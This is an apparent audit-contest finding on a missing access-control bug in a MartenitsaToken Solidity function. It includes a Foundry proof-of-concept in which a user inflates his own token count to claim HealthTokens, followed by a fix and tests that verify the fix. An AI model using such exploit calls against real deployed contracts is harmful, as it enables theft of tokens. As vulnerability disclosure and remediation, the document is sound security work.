Submission Details
Severity: high
Valid

[H-3] `MartenitsaToken::updateCountMartenitsaTokensOwner` Missing Access Control

Description: The `MartenitsaToken::updateCountMartenitsaTokensOwner` function is meant to keep `countMartenitsaTokensOwner` in sync with the number of MartenitsaTokens a user holds, and is supposed to be called only by the marketplace contract. The function has no access control, so any user can call it directly and increment their own `countMartenitsaTokensOwner` as many times as they like, then claim HealthTokens from the marketplace without owning a single NFT.

```solidity
    function updateCountMartenitsaTokensOwner(
        address owner,
        string memory operation
@>  ) external { // no access control - only marketplace should be able to call this!
        if (
            keccak256(abi.encodePacked(operation)) ==
            keccak256(abi.encodePacked("add"))
        ) {
            countMartenitsaTokensOwner[owner] += 1;
        } else if (
            keccak256(abi.encodePacked(operation)) ==
            keccak256(abi.encodePacked("sub"))
        ) {
            countMartenitsaTokensOwner[owner] -= 1;
        } else {
            revert("Wrong operation");
        }
    }
```

Impact: This vulnerability can enable users to artificially inflate their token counts and mint HealthTokens without any legitimate ownership of MartenitsaTokens, leading to an imbalance in the token economy. It can also be used to manipulate the marketplace and the value of HealthTokens, affecting the overall health and trust in the system.

Proof of Concept: Exploit Scenario:

  1. Bob calls `updateCountMartenitsaTokensOwner(bob, "add")` 300 times, without owning any MartenitsaToken.

  2. Bob calls `marketplace.collectReward()` and receives 100 HealthTokens.

```solidity
    function testUpdateCountMartenitsaTokensOwnerMissesAccessControl() public {
        // Bob is an ordinary EOA, not the marketplace contract
        vm.startPrank(bob);
        // Inflate Bob's counter directly; nothing stops a non-marketplace caller
        for (uint256 i; i < 300; i++) {
            martenitsaToken.updateCountMartenitsaTokensOwner(bob, "add");
        }
        // The marketplace pays out based on the inflated counter
        marketplace.collectReward();
        vm.stopPrank();
        // 300 counted "tokens" yield 100 HealthTokens although Bob owns no NFT
        assertEq(healthToken.balanceOf(bob), 100 ether);
    }
```

Recommended Mitigation: Add access control to `updateCountMartenitsaTokensOwner` so that only the authorized caller (the marketplace contract) can invoke it. With the check in place, users can no longer manipulate their own token counts.

```diff
    function updateCountMartenitsaTokensOwner(
        address owner,
        string memory operation
    ) external {
+       require(
+           msg.sender == address(_martenitsaMarketplace),
+           "Unable to call this function"
+       );
        if (
            keccak256(abi.encodePacked(operation)) ==
            keccak256(abi.encodePacked("add"))
        ) {
            countMartenitsaTokensOwner[owner] += 1;
        } else if (
            keccak256(abi.encodePacked(operation)) ==
            keccak256(abi.encodePacked("sub"))
        ) {
            countMartenitsaTokensOwner[owner] -= 1;
        } else {
            revert("Wrong operation");
        }
    }
```
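To confirm the recommendation actually closes the hole, here is an added Foundry test (not part of the original submission or the project's code) that runs the PoC call against a minimal stand-in contract with the `require` applied and checks that the marketplace path still works. The `HardenedCounter` contract, its constructor argument and the `makeAddr` addresses are assumptions; the real contract's marketplace wiring is not shown in the report.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Hypothetical stand-in for MartenitsaToken, reduced to the function under discussion
// with the recommended require() applied (constructor wiring is assumed, not the project's).
contract HardenedCounter {
    address private immutable _martenitsaMarketplace;
    mapping(address => uint256) public countMartenitsaTokensOwner;
    constructor(address marketplace) {
        _martenitsaMarketplace = marketplace;
    }
    function updateCountMartenitsaTokensOwner(address owner, string memory operation) external {
        // The fix from the report: only the marketplace contract may move the counter.
        require(msg.sender == _martenitsaMarketplace, "Unable to call this function");
        bytes32 op = keccak256(abi.encodePacked(operation));
        if (op == keccak256("add")) countMartenitsaTokensOwner[owner] += 1;
        else if (op == keccak256("sub")) countMartenitsaTokensOwner[owner] -= 1;
        else revert("Wrong operation");
    }
}

contract AccessControlTest is Test {
    HardenedCounter token;
    address marketplace = makeAddr("marketplace");
    address bob = makeAddr("bob");

    function setUp() public {
        token = new HardenedCounter(marketplace);
    }

    // The PoC loop from the report now reverts on its first iteration, so the counter never moves.
    function testBobCannotInflateCount() public {
        vm.prank(bob);
        vm.expectRevert(bytes("Unable to call this function"));
        token.updateCountMartenitsaTokensOwner(bob, "add");
        assertEq(token.countMartenitsaTokensOwner(bob), 0);
    }

    // The legitimate caller still works, in both directions.
    function testMarketplaceCanStillUpdate() public {
        vm.startPrank(marketplace);
        token.updateCountMartenitsaTokensOwner(bob, "add");
        token.updateCountMartenitsaTokensOwner(bob, "sub");
        vm.stopPrank();
        assertEq(token.countMartenitsaTokensOwner(bob), 0);
    }
}
```

Run it with `forge test` in a project that has forge-std installed; both tests should pass against the hardened function and the first one fails against the original.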
Updates

Lead Judging Commences

bube (Lead Judge), over 1 year ago: Submission Judgement Published. Validated.

Assigned finding tags: Missing access control
